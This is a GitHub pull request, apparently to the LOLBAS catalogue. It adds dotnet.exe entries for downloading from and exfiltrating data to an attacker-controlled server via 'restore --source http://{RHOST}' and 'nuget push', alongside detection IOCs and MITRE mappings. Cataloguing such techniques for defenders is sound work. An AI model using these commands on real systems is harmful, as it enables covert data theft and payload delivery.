Skip to content

Add Download and Upload commands for dotnet.exe #495

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
Pumi96 wants to merge 2 commits into
base: master
Choose a base branch
from
+27 −1
Open

Add Download and Upload commands for dotnet.exe #495

Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
4a9a0d7
Add Download and Upload commands for dotnet.exe
Pumi96 Apr 2, 2026
4973b19
Correct category spelling from 'AWL bypass' to 'AWL Bypass'
Pumi96 Apr 2, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
28 changes: 27 additions & 1 deletion yml/OtherMSBinaries/Dotnet.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -40,21 +40,47 @@ Commands:
OperatingSystem: Windows 10 and up with .NET Core installed
Tags:
- Execute: CSharp
- Command: dotnet.exe restore --source http://{RHOST}/packages/ {PATH:.csproj}
Description: dotnet.exe will download NuGet packages (.nupkg) from an arbitrary HTTP server specified via the --source flag.
Usecase: Download files from a remote attacker-controlled server using a Microsoft-signed binary. Traffic goes over HTTP/HTTPS as NuGet protocol requests.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10 and up with .NET SDK installed
Tags:
- Download: HTTP
- Command: dotnet.exe nuget push {PATH:.nupkg} --source http://{RHOST}/api/v2/package --api-key {APIKEY}
Description: dotnet.exe will upload a NuGet package (.nupkg) to an arbitrary HTTP server via HTTP PUT request.
Usecase: Exfiltrate data by packaging it as a .nupkg file and pushing it to an attacker-controlled NuGet server. A .nupkg is a ZIP file that can contain arbitrary data.
Category: Upload
Privileges: User
MitreID: T1048
OperatingSystem: Windows 10 and up with .NET SDK installed
Tags:
- Upload: HTTP
Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe'
- Path: C:\Program Files\dotnet\dotnet.exe
- Path: C:\Program Files (x86)\dotnet\dotnet.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: dotnet.exe spawned an unknown process
- IOC: dotnet.exe making outbound HTTP connections to non-standard NuGet sources
- IOC: dotnet.exe command line containing --source with non-Microsoft URLs
- IOC: dotnet.exe nuget push command uploading to external servers
Resources:
- Link: https://twitter.com/_felamos/status/1204705548668555264
- Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
- Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
- Link: https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/
- Link: https://learn.microsoft.com/en-us/dotnet/core/tools/dotnet-restore
- Link: https://learn.microsoft.com/en-us/dotnet/core/tools/dotnet-nuget-push
Acknowledgement:
- Person: felamos
Handle: '@_felamos'
- Person: Jimmy
Handle: '@bohops'
- Person: yamalon
Handle: '@mavinject'
- Person: Noam
Handle: '@pumi96'
Loading